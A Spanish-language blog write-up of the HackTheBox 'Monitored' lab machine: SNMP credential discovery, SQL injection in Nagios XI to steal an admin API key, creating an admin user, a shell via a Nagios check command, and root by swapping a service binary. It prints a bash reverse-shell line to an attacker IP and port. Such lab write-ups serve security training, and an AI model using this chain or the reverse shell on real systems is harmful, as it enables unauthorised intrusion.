Skip to main content
HackTheBox machines – Monitored WriteUp

HackTheBox machines – Monitored WriteUp

Monitored es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox basada en Linux

Monitored es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox y es de dificultad Media.

En este caso se trata de una máquina basada en el Sistema Operativo Linux.

 

Escaneo de puertos

Como de costumbre, agregamos la IP de la máquina Monitored 10.129.240.242 a /etc/hosts como monitored.htb y comenzamos con el escaneo de puertos nmap.

Una vez detectados los puertos lanzamos un escaneo mas detallado sobre los mismos

Enumeramos también los puertos abiertos en udp y vemos los siguientes

 

Enumeración

Accedemos al portal web en el puerto 80 a través del navegador y nos redirecciona a la url

Donde vemos la siguiente página web

HackTheBox machines – Monitored WriteUp

En la misma vemos un enlace a la página de login de Nagios XI

HackTheBox machines – Monitored WriteUp

 

Por aqui no parece que podamos hacer mucho más así que enumeramos directorios y encontramos un directorio /nagios

 

Así que accedemos, aunque nos solicita claves de autenticación del webserver, las cuales no tenemos

HackTheBox machines – Monitored WriteUp

 

Vimos al principio que el puerto udp de snmp estaba abierto así que enumeramos el mismo y encontramos unas credenciales

 

Vistas las credenciales encontradas en la ejecución del script vamos a utilizarlas para acceder al portal de nagios y llegamos al dashboard de la misma

acceso al portal de nagios

 

Acceso al panel de nagiosxi

Googleamos un poco y encontramos varias vulnerabilidades en nagios xi.

Existe una vulnerabilidad de SQLi pero antes vamos a necesitar autenticarnos como vemos en este post.

Así probamos con curl a ver si podemos obtener el token

Y es posible, así que ahora vamos a utilizar sqlmap para tratar de leer la ddbb

Y entre los resultados obtenemos la api key del usuario admin

Así que con la apikey de admin vamos a generar un nuevo usuario con permisos de administrador

Y con las credenciales de este usuario recién creado accedemos a la web de nagiosxi, nos pedirá aceptar la licencia y cambiar la password, y llegaremos al dashboard

Acceso de administrador al portal de nagiosxi

 

Obteniendo una shell

Ya estamos como admin en nagiosxi, así que ahora para obtener una shell vamos a crear un comando de chequeo del host y lo ejecutaremos para obtener acceso.

Nos vamos a

Configure -> Core Config Manager -> Commands

Creación de comandos

 

Y añadimos un comando nuevo con los siguientes datos

  • Name: shell
  • Command Line: bash -c ‘bash -i >& /dev/tcp/10.10.14.91/4444 0>&1’
  • Command Type: Check
  • Active: Yes

Una vez lo tenemos aplicamos los cambios y nos vamos a la sección siguiente

Monitoring -> Hosts -> localhost

Seleccionamos nuestro comando y lo lanzamos

Ejecutando nuestro comando

 

Y tenemos nuestra shell

 

Obteniendo la flag de user

Revisamos en la home del usuario y cogemos la primera flag

 

Escalado de privilegios

Una vez dentro revisamos los permisos del usuario y vemos que puede ejecutar muchos scripts como root

 

Nos centramos en el script manage_services.sh y revisamos los binarios posibles, viendo varios para los cuales tenemos permisos de escritura

 

Así que generamos el binario de npcd incluyendo una revshell

Paramos el servicio

Reemplazamos el binario

Levantamos el servicio

Y somos root

 

Obteniendo la flag de root

Y por último cogemos la flag

Y ya tenemos nuestra flag de root para completar esta máquina y conseguir nuestros puntos.

 

Si eres usuario de HackTheBox y te gustó mi writeup, por favor, dame respeto en el siguiente enlace

 

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *